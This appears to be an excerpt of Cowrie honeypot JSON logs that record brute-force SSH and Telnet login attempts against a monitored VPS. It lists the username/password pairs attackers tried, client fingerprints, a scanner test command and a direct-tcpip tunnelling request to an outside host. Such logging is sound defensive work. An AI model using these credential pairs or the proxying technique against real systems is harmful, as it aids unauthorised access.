om","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:21:41.765139Z","src_ip":"196.251.86.249","session":"1d45dbeff4dc"}
{"eventid":"cowrie.login.failed","username":"yuanwd","password":"yuanwd","message":"login attempt [yuanwd/yuanwd] failed","sensor":"my-vps","timestamp":"2025-08-26T09:21:43.347646Z","src_ip":"196.251.86.249","session":"1d45dbeff4dc"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:21:44.859883Z","src_ip":"196.251.86.249","session":"1d45dbeff4dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35048,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e59463cb0d6","protocol":"telnet","message":"New connection: 212.227.125.160:35048 (1.2.3.4:23) [session: 4e59463cb0d6]","sensor":"my-vps","timestamp":"2025-08-26T09:21:54.759521Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":50054,"dst_ip":"1.2.3.4","dst_port":23,"session":"19f77e5cb609","protocol":"telnet","message":"New connection: 139.59.27.234:50054 (1.2.3.4:23) [session: 19f77e5cb609]","sensor":"my-vps","timestamp":"2025-08-26T09:22:21.170807Z"}
{"eventid":"cowrie.session.closed","duration":30.486675262451172,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:25.246128Z","src_ip":"212.227.125.160","session":"4e59463cb0d6"}
{"eventid":"cowrie.session.closed","duration":4.113015413284302,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:25.283748Z","src_ip":"139.59.27.234","session":"19f77e5cb609"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":57416,"dst_ip":"1.2.3.4","dst_port":23,"session":"75e39b838a34","protocol":"telnet","message":"New connection: 139.59.27.234:57416 (1.2.3.4:23) [session: 75e39b838a34]","sensor":"my-vps","timestamp":"2025-08-26T09:22:25.551404Z"}
{"eventid":"cowrie.session.closed","duration":0.8170104026794434,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:26.368344Z","src_ip":"139.59.27.234","session":"75e39b838a34"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":57428,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3b8a40f3965","protocol":"telnet","message":"New connection: 139.59.27.234:57428 (1.2.3.4:23) [session: a3b8a40f3965]","sensor":"my-vps","timestamp":"2025-08-26T09:22:26.625225Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:22:27.231452Z","src_ip":"139.59.27.234","session":"a3b8a40f3965"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:22:27.262953Z","src_ip":"139.59.27.234","session":"a3b8a40f3965"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T09:22:27.556553Z","src_ip":"139.59.27.234","session":"a3b8a40f3965"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:28.817877Z","src_ip":"139.59.27.234","session":"a3b8a40f3965"}
{"eventid":"cowrie.session.closed","duration":2.199298858642578,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:28.824439Z","src_ip":"139.59.27.234","session":"a3b8a40f3965"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58560,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac380b80063","protocol":"ssh","message":"New connection: 196.251.86.249:58560 (1.2.3.4:22) [session: 6ac380b80063]","sensor":"my-vps","timestamp":"2025-08-26T09:22:43.381642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:22:43.969856Z","src_ip":"196.251.86.249","session":"6ac380b80063"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:22:43.970570Z","src_ip":"196.251.86.249","session":"6ac380b80063"}
{"eventid":"cowrie.login.failed","username":"server","password":"server","message":"login attempt [server/server] failed","sensor":"my-vps","timestamp":"2025-08-26T09:22:46.135142Z","src_ip":"196.251.86.249","session":"6ac380b80063"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:22:47.233590Z","src_ip":"196.251.86.249","session":"6ac380b80063"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37818,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6a3d3f02c70","protocol":"ssh","message":"New connection: 212.227.235.229:37818 (1.2.3.4:22) [session: f6a3d3f02c70]","sensor":"my-vps","timestamp":"2025-08-26T09:23:09.666503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:23:10.441581Z","src_ip":"212.227.235.229","session":"f6a3d3f02c70"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:23:10.442337Z","src_ip":"212.227.235.229","session":"f6a3d3f02c70"}
{"eventid":"cowrie.login.success","username":"root","password":"Lokajit@123","message":"login attempt [root/Lokajit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:23:14.007731Z","src_ip":"212.227.235.229","session":"f6a3d3f02c70"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:23:14.656891Z","src_ip":"212.227.235.229","session":"f6a3d3f02c70"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60508,"dst_ip":"1.2.3.4","dst_port":22,"session":"2812c77f0291","protocol":"ssh","message":"New connection: 196.251.86.249:60508 (1.2.3.4:22) [session: 2812c77f0291]","sensor":"my-vps","timestamp":"2025-08-26T09:23:45.382495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:23:46.161837Z","src_ip":"196.251.86.249","session":"2812c77f0291"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:23:46.186287Z","src_ip":"196.251.86.249","session":"2812c77f0291"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-26T09:23:48.199244Z","src_ip":"196.251.86.249","session":"2812c77f0291"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:23:49.738997Z","src_ip":"196.251.86.249","session":"2812c77f0291"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16707,"dst_ip":"1.2.3.4","dst_port":22,"session":"edb156862930","protocol":"ssh","message":"New connection: 212.227.125.160:16707 (1.2.3.4:22) [session: edb156862930]","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.361396Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.362572Z","src_ip":"212.227.125.160","session":"edb156862930"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":16981,"dst_ip":"1.2.3.4","dst_port":22,"session":"d28907f25673","protocol":"ssh","message":"New connection: 212.227.125.160:16981 (1.2.3.4:22) [session: d28907f25673]","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.475450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.476093Z","src_ip":"212.227.125.160","session":"d28907f25673"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.591362Z","src_ip":"212.227.125.160","session":"d28907f25673"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:24:16.938487Z","src_ip":"212.227.125.160","session":"d28907f25673"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T09:24:17.055056Z","session":"d28907f25673"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54104,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f85dc80f2f6","protocol":"ssh","message":"New connection: 212.227.125.160:54104 (1.2.3.4:22) [session: 3f85dc80f2f6]","sensor":"my-vps","timestamp":"2025-08-26T09:24:18.544044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:24:18.544796Z","src_ip":"212.227.125.160","session":"3f85dc80f2f6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T09:24:18.705283Z","src_ip":"212.227.125.160","session":"3f85dc80f2f6"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:24:26.544539Z","src_ip":"212.227.125.160","session":"3f85dc80f2f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35692,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5ce2d650719","protocol":"telnet","message":"New connection: 212.227.125.160:35692 (1.2.3.4:23) [session: c5ce2d650719]","sensor":"my-vps","timestamp":"2025-08-26T09:24:28.547078Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50944,"dst_ip":"1.2.3.4","dst_port":22,"session":"1de0e6291c13","protocol":"ssh","message":"New connection: 212.227.235.229:50944 (1.2.3.4:22) [session: 1de0e6291c13]","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.030275Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34892,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a7c94869dd6","protocol":"ssh","message":"New connection: 196.251.86.249:34892 (1.2.3.4:22) [session: 7a7c94869dd6]","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.146850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.622113Z","src_ip":"212.227.235.229","session":"1de0e6291c13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.622856Z","src_ip":"212.227.235.229","session":"1de0e6291c13"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.893957Z","src_ip":"196.251.86.249","session":"7a7c94869dd6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:24:50.894645Z","src_ip":"196.251.86.249","session":"7a7c94869dd6"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-26T09:24:53.301770Z","src_ip":"196.251.86.249","session":"7a7c94869dd6"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass123!","message":"login attempt [root/Pass123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:24:55.359528Z","src_ip":"212.227.235.229","session":"1de0e6291c13"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:24:55.610424Z","src_ip":"196.251.86.249","session":"7a7c94869dd6"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:24:56.599275Z","src_ip":"212.227.235.229","session":"1de0e6291c13"}
{"eventid":"cowrie.session.closed","duration":30.4739089012146,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:24:59.020918Z","src_ip":"212.227.125.160","session":"c5ce2d650719"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40294,"dst_ip":"1.2.3.4","dst_port":23,"session":"7923ac744139","protocol":"telnet","message":"New connection: 212.227.235.229:40294 (1.2.3.4:23) [session: 7923ac744139]","sensor":"my-vps","timestamp":"2025-08-26T09:25:12.146442Z"}
{"eventid":"cowrie.session.connect","src_ip":"47.102.184.247","src_port":44326,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ed353733036","protocol":"telnet","message":"New connection: 47.102.184.247:44326 (1.2.3.4:23) [session: 4ed353733036]","sensor":"my-vps","timestamp":"2025-08-26T09:25:17.652555Z"}
{"eventid":"cowrie.session.connect","src_ip":"47.102.184.247","src_port":44372,"dst_ip":"1.2.3.4","dst_port":23,"session":"625b2aa8fbaa","protocol":"telnet","message":"New connection: 47.102.184.247:44372 (1.2.3.4:23) [session: 625b2aa8fbaa]","sensor":"my-vps","timestamp":"2025-08-26T09:25:18.658571Z"}
{"eventid":"cowrie.session.connect","src_ip":"47.102.184.247","src_port":44474,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8f0d7c1b347","protocol":"telnet","message":"New connection: 47.102.184.247:44474 (1.2.3.4:23) [session: b8f0d7c1b347]","sensor":"my-vps","timestamp":"2025-08-26T09:25:21.626897Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:25:26.476290Z","src_ip":"212.227.125.160","session":"d28907f25673"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57164,"dst_ip":"1.2.3.4","dst_port":23,"session":"935fec7b43c2","protocol":"telnet","message":"New connection: 212.227.125.160:57164 (1.2.3.4:23) [session: 935fec7b43c2]","sensor":"my-vps","timestamp":"2025-08-26T09:25:37.139538Z"}
{"eventid":"cowrie.session.closed","duration":31.367889881134033,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:25:43.514266Z","src_ip":"212.227.235.229","session":"7923ac744139"}
{"eventid":"cowrie.session.closed","duration":30.80484938621521,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:25:48.457320Z","src_ip":"47.102.184.247","session":"4ed353733036"}
{"eventid":"cowrie.session.closed","duration":31.27701163291931,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:25:49.935519Z","src_ip":"47.102.184.247","session":"625b2aa8fbaa"}
{"eventid":"cowrie.session.closed","duration":33.20629811286926,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:25:54.833132Z","src_ip":"47.102.184.247","session":"b8f0d7c1b347"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37278,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f54aada845","protocol":"ssh","message":"New connection: 196.251.86.249:37278 (1.2.3.4:22) [session: 57f54aada845]","sensor":"my-vps","timestamp":"2025-08-26T09:25:55.807526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:25:56.662540Z","src_ip":"196.251.86.249","session":"57f54aada845"}
